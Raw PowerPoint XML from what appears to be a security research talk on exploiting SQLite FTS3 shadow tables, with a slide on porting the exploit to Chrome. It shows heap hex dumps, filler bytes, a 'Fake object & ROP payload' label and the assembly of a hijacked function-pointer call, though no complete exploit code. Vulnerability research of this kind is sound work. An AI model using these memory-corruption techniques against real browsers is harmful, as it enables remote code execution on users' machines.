            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>01 00 00 00 00 00 00 00 08 42 54 A4 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40 BA B1 20 C3 21 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> A0 2F B1 20 C3 21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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>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21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8175669" y="5569359"/>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45478573"/>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7352" y="228600"/>
            <a:ext cx="5391148"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14450" y="228600"/>
            <a:ext cx="4152898"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247775" y="95250"/>
            <a:ext cx="9677400" cy="664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Straight Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5467348" y="2373827"/>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5467348" y="4514646"/>
            <a:ext cx="5391152"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467348" y="224149"/>
            <a:ext cx="5572125" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10 21 54 A4 C3 21 00 00 40 CC 2F A4 C3 80 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 00 41 05 04 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40 54 A4 C3 21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ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>30 21 54 A4 C3 21 00 00 00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 00 41 05 04 00 00 00 00</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="TextBox 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5467348" y="4531466"/>
            <a:ext cx="5572125" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>58 24 A2 43 AA 7F 00 00 00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 10 21 FA 01 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10 43 B1 20 C3 21 00 00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0 43 B1 20 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>01 00 00 00 00 00 00 00 08 42 54 A4 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40 BA B1 20 C3 21 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 50 54 A4 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…………</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5467350" y="2393459"/>
            <a:ext cx="5572125" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…………</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8175669" y="5569359"/>
            <a:ext cx="2649353" cy="21800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p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5467346" y="2464835"/>
            <a:ext cx="2649353" cy="218008"/>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 name="Curved Connector 4"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="1"/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5467347" y="2573839"/>
            <a:ext cx="2708323" cy="3104524"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 11833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3479720" y="2369202"/>
            <a:ext cx="1549479" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Fake object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>&amp; ROP payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143018235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Shadow Tables</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10782670" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Regular SQLite tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Supports various Virtual Table specific functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>For fts3, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>indexs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> are stored in their respective shadow tables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>tablename_segments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>tablename_segdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 shadow tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> for fts3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2532132531"/>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altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>At the time of the function pointer call</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4406381" y="2289970"/>
            <a:ext cx="3379237" cy="1428279"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="363636"/>
          </a:solidFill>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, [r12+48h]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>rcx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, [rax+10h]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>call    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>rcx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2985845" y="4634641"/>
            <a:ext cx="6220307" cy="1147188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1486520523"/>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altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The end</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="twilight princess beast ganonì ëí ì´ë¯¸ì§ ê²ìê²°ê³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1475" y="1518046"/>
            <a:ext cx="8909049" cy="50113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602376"/>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altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>……or not…?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="twilight princess ganon dark lordì ëí ì´ë¯¸ì§ ê²ìê²°ê³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6849" y="1480542"/>
            <a:ext cx="9051925" cy="50917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3149292"/>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altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Porting the exploit to Chrome Stable Release</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endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
